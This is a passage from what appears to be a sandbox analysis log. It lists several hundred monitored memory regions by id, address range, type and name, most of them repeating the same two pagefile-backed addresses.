14866 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14867 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14868 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14869 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14870 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14871 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14872 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14873 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14874 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14875 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14876 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14877 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14878 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14879 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14880 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14881 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14882 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14883 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14884 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14885 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14886 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14887 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14888 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14889 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14890 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14891 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14892 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14893 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14894 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14895 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14896 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14897 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14898 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14899 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14900 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14901 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14902 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14903 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14904 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14905 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14906 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14907 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14908 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14909 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14910 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14911 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14912 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14913 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14914 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14915 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14916 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14917 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14918 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14919 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 14920 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 14921 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14922 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14923 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 14924 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 14925 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14926 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14927 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14928 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 14929 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 14930 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14931 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14932 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14933 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14934 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14935 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14936 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14937 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14938 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14939 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14940 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14941 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14942 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14943 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14944 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14945 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14946 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14947 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14948 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14949 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14950 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14951 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14952 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14953 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14954 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14955 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14956 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14957 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14958 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14959 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14960 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14961 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14962 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14963 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14964 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14965 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14966 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14967 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14968 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14969 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14970 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14971 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14972 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14973 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14974 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14975 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14976 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14977 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14978 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14979 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14980 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14981 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14982 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14983 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14984 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14985 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14986 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14987 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14988 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14989 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14990 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14991 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14992 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14993 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14994 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14995 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14996 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14997 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14998 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14999 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15000 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15001 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15002 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15003 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15004 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 15005 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 15006 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15007 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15008 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15009 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15010 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15011 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15012 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15013 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15014 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15015 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15016 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15017 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15018 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15019 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15020 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15021 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15022 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15023 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15024 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15025 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15026 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15027 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15028 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15029 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15030 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15031 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15032 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15033 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15034 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15035 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15036 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15037 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 15038 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 15039 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15040 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15041 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 15042 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 15043 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15044 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15045 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15046 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15047 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15048 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15049 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15050 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15051 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 